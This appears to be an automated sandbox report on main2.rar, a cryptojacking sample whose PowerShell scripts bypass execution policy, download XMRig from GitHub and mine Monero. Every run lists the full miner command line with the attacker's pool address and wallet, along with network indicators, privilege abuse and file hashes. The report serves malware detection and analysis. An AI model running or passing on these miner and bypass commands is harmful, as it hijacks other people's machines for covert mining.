Malware Analysis Report

2025-01-06 15:41

Sample ID 240525-s5989shd4y
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-25 15:43

Signatures

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:18

Platform

win11-20240419-en

Max time kernel

1799s

Max time network

1757s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3108-0-0x00007FF830B93000-0x00007FF830B95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a3jp1zla.xhr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:22

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 138.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 72.239.69.13.in-addr.arpa udp

Files

memory/1500-0-0x00007FFC5F793000-0x00007FFC5F795000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcbs0ztt.g22.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:23

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dkfnjvea.x5d.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2280-25-0x00007FFBE4F70000-0x00007FFBE595C000-memory.dmp

memory/2280-48-0x00000222EBE60000-0x00000222EBE72000-memory.dmp

memory/2280-61-0x00000222EBE40000-0x00000222EBE4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:32

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1788s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

memory/3948-0-0x00007FFD4F1B3000-0x00007FFD4F1B5000-memory.dmp

memory/3948-6-0x000002A6B3C70000-0x000002A6B3C92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tf21wm35.rjh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:43

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1744s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0bq0a24r.rd3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:16

Platform

win11-20240426-en

Max time kernel

1796s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3356-0-0x00007FFE180D3000-0x00007FFE180D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhfwymfu.rmz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:16

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1741s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/2360-2-0x00007FFAD8ED3000-0x00007FFAD8ED4000-memory.dmp

memory/2360-5-0x0000021733620000-0x0000021733642000-memory.dmp

memory/2360-8-0x00007FFAD8ED0000-0x00007FFAD98BC000-memory.dmp

memory/2360-10-0x00007FFAD8ED0000-0x00007FFAD98BC000-memory.dmp

memory/2360-9-0x000002174BDD0000-0x000002174BE46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fqny3km0.xe3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2360-25-0x00007FFAD8ED0000-0x00007FFAD98BC000-memory.dmp

memory/2360-48-0x000002174BD90000-0x000002174BDA2000-memory.dmp

memory/2360-61-0x0000021733660000-0x000002173366A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4448-90-0x000001C68A810000-0x000001C68A830000-memory.dmp

memory/4448-91-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

